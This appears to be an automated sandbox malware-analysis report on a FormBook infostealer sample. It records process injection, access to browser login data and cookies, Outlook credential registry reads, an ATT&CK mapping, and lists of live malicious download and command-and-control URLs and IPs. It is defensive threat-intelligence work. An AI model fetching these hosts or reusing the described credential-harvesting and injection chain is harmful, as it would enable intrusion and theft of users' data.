            Source: C:\Users\user\Desktop\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1130008Jump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: crUcuBAsmdG.exe, 00000005.00000002.3318030897.0000000001810000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000005.00000000.1811721054.0000000001811000.00000002.00000001.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318179146.0000000001630000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\x.exeQueries volume information: C:\Users\user\Desktop\x.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		612
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1509400 Sample: x.exe Startdate: 11/09/2024 Architecture: WINDOWS Score: 100 34 www.withad.xyz 2->34 36 www.takitoon.xyz 2->36 38 16 other IPs or domains 2->38 48 Suricata IDS alerts for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 56 5 other signatures 2->56 10 x.exe 15 3 2->10         started        signatures3 54 Performs DNS queries to domains with low reputation 36->54 process4 dnsIp5 40 epsys.ro 89.42.218.72, 443, 49706, 49707 ROMARGRO Romania 10->40 32 C:\Users\user\AppData\Local\...\x.exe.log, CSV 10->32 dropped 70 Writes to foreign memory regions 10->70 72 Allocates memory in foreign processes 10->72 74 Injects a PE file into a foreign processes 10->74 15 aspnet_compiler.exe 10->15         started        18 aspnet_compiler.exe 10->18         started        file6 signatures7 process8 signatures9 76 Maps a DLL or memory area into another process 15->76 20 crUcuBAsmdG.exe 15->20 injected process10 signatures11 58 Found direct / indirect Syscall (likely to bypass EDR) 20->58 23 rasdial.exe 13 20->23         started        process12 signatures13 60 Tries to steal Mail credentials (via file / registry access) 23->60 62 Tries to harvest and steal browser information (history, passwords, etc) 23->62 64 Modifies the context of a thread in another process (thread injection) 23->64 66 3 other signatures 23->66 26 crUcuBAsmdG.exe 23->26 injected 30 firefox.exe 23->30         started        process14 dnsIp15 42 www.withad.xyz 162.0.238.43, 49729, 49730, 49731 NAMECHEAP-NETUS Canada 26->42 44 filelabel.info 3.33.130.190, 49714, 49715, 49716 AMAZONEXPANSIONGB United States 26->44 46 5 other IPs or domains 26->46 68 Found direct / indirect Syscall (likely to bypass EDR) 26->68 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            x.exe21%ReversingLabs
            x.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://epsys.rod0%Avira URL Cloudsafe
            http://www.coffee-and-blends.info/v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A==0%Avira URL Cloudsafe
            http://www.filelabel.info/2w7y/0%Avira URL Cloudsafe
            http://www.pmjjewels.online/zksk/0%Avira URL Cloudsafe
            http://crl.microsv0%Avira URL Cloudsafe
            https://www.zoho.com/sites/images/professionally-crafted-themes.png0%Avira URL Cloudsafe
            http://www.comrade.lol/y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPK0%Avira URL Cloudsafe
            http://www.pmjjewels.online0%Avira URL Cloudsafe
            http://www.takitoon.xyz/484o/0%Avira URL Cloudsafe
            http://www.mayawashfold.net/mtee/0%Avira URL Cloudsafe
            https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech0%Avira URL Cloudsafe
            http://www.zz82x.top/ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPK0%Avira URL Cloudsafe
            https://epsys.ro/we/bin.exeDhttps://epsys.ro/we/DEMONCODER.dll0%Avira URL Cloudsafe
            https://epsys.ro0%Avira URL Cloudsafe
            http://www.wcm50.top/sok0/0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/em49/?7FhphPx8=vV5RcTk6UjJnp8cGdrCla/0gYy6e1BMmF8l1hdm9JL6NOoivCUbMAyYanCg5fgzmDPzjWpeb906PoOnUGjRvxfKMvQWnmHyH5PNq1cjGr2lL9E1sX95rHCmr3UDKreGapg==&dD=3XyH6pjxGLhPK0%Avira URL Cloudsafe
            http://www.wcm50.top/sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPK0%Avira URL Cloudsafe
            http://microsoft.conXn0%Avira URL Cloudsafe
            http://www.withad.xyz/r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPK0%Avira URL Cloudsafe
            http://www.withad.xyz/r0nv/0%Avira URL Cloudsafe
            https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb0%Avira URL Cloudsafe
            http://www.lanxuanz.tech/em49/0%Avira URL Cloudsafe
            http://www.comrade.lol/y13u/0%Avira URL Cloudsafe
            http://epsys.ro0%Avira URL Cloudsafe
            https://epsys.ro/we/bin.exe100%Avira URL Cloudmalware
            https://epsys.ro/we/DEMONCODER.dll0%Avira URL Cloudsafe
            http://www.takitoon.xyz/484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA==0%Avira URL Cloudsafe
            http://www.zz82x.top/ym8o/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            zhs.zohosites.com
            		136.143.186.12
            		truefalse
              		unknown
              wcm50.top
              		154.23.184.60
              		truefalse
                		unknown
                epsys.ro
                		89.42.218.72
                		truetrue
                  		unknown
                  comrade.lol
                  		3.33.130.190
                  		truefalse
                    		unknown
                    takitoon.xyz
                    		3.33.130.190
                    		truetrue
                      		unknown
                      mayawashfold.net
                      		3.33.130.190
                      		truefalse
                        		unknown
                        www.coffee-and-blends.info
                        		217.160.0.231
                        		truefalse
                          		unknown
                          zz82x.top
                          		38.47.232.196
                          		truefalse
                            		unknown
                            www.withad.xyz
                            		162.0.238.43
                            		truetrue
                              		unknown
                              filelabel.info
                              		3.33.130.190
                              		truefalse
                                		unknown
                                www.pmjjewels.online
                                		199.59.243.226
                                		truefalse
                                  		unknown
                                  www.comrade.lol
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.takitoon.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.mayawashfold.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.zz82x.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.wcm50.top
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.filelabel.info
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.lanxuanz.tech
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.mayawashfold.net/mtee/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.comrade.lol/y13u/?7FhphPx8=fH3/Xv1nMASIQ/zMydPCNRqTRo/7DHU21rAsiPZWyPbRdSEWP3tT61GDvb9wKeE7ACEQcE/YA9zT1IEe20vxhqwBFMQRq7yvXeclZd7UWFm0QPQ8MC+KotTERjHUuT2ydA==&dD=3XyH6pjxGLhPKfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.coffee-and-blends.info/v35v/?dD=3XyH6pjxGLhPK&7FhphPx8=QLykxYh4zvA0eVm/xmgK7YOftMTq5+WaLw1iNOUTi/NZcFg0+k6SoYLj+BPGFkyr7e2u2NP+bwB2tUbtyEagHZeSqjZTmkHziwyHhfbKN4nr0Mmvp+QBtaJQgZEcDG5b/A==false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.filelabel.info/2w7y/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.pmjjewels.online/zksk/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.takitoon.xyz/484o/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zz82x.top/ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPKfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wcm50.top/sok0/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wcm50.top/sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPKfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.withad.xyz/r0nv/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lanxuanz.tech/em49/?7FhphPx8=vV5RcTk6UjJnp8cGdrCla/0gYy6e1BMmF8l1hdm9JL6NOoivCUbMAyYanCg5fgzmDPzjWpeb906PoOnUGjRvxfKMvQWnmHyH5PNq1cjGr2lL9E1sX95rHCmr3UDKreGapg==&dD=3XyH6pjxGLhPKfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.withad.xyz/r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPKfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lanxuanz.tech/em49/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.comrade.lol/y13u/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://epsys.ro/we/bin.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://epsys.ro/we/DEMONCODER.dlltrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.takitoon.xyz/484o/?dD=3XyH6pjxGLhPK&7FhphPx8=z1nK31grp15IuvUbSP4/u/QrWitMYn42JKqO08GB6oqTWnKkjAzy9dGBseVsOzNK4BinV2NwNZiNjrhzDSa+ygrHL9YkaYF0wsPm43jKW1EMq01K+L7L4dXd6SCtK3hNJA==false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.zz82x.top/ym8o/false
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabrasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://duckduckgo.com/ac/?q=rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://epsys.rodx.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.zoho.com/sites/images/professionally-crafted-themes.pngrasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.microsvx.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.pmjjewels.onlinecrUcuBAsmdG.exe, 00000009.00000002.3320183434.000000000544D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.ecosia.org/newtab/rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techrasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://epsys.ro/we/bin.exeDhttps://epsys.ro/we/DEMONCODER.dllx.exe, 00000000.00000002.3320685418.0000000003149000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.00000000030DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://epsys.rox.exe, 00000000.00000002.3320685418.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://microsoft.conXnx.exe, 00000000.00000002.3325930862.00000000061CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbrasdial.exe, 00000006.00000002.3319482531.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, crUcuBAsmdG.exe, 00000009.00000002.3318476241.0000000003B7E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://epsys.rox.exe, 00000000.00000002.3320685418.000000000316C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex.exe, 00000000.00000002.3320685418.0000000003154000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000006.00000002.3321200488.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                217.160.0.231
                                                		www.coffee-and-blends.infoGermany
                                                		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                162.0.238.43
                                                		www.withad.xyzCanada
                                                		22612NAMECHEAP-NETUStrue
                                                136.143.186.12
                                                		zhs.zohosites.comUnited States
                                                		2639ZOHO-ASUSfalse
                                                38.47.232.196
                                                		zz82x.topUnited States
                                                		174COGENT-174USfalse
                                                199.59.243.226
                                                		www.pmjjewels.onlineUnited States
                                                		395082BODIS-NJUSfalse
                                                89.42.218.72
                                                		epsys.roRomania
                                                		205275ROMARGROtrue
                                                3.33.130.190
                                                		comrade.lolUnited States
                                                		8987AMAZONEXPANSIONGBtrue
                                                154.23.184.60
                                                		wcm50.topUnited States
                                                		174COGENT-174USfalse

                                                General Information

                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1509400
                                                Start date and time:2024-09-11 15:42:03 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 27s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:x.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@9/2@11/8
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 95%
                                                • Number of executed functions: 95
                                                • Number of non-executed functions: 300
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target crUcuBAsmdG.exe, PID 5380 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: x.exe

                                                Simulations

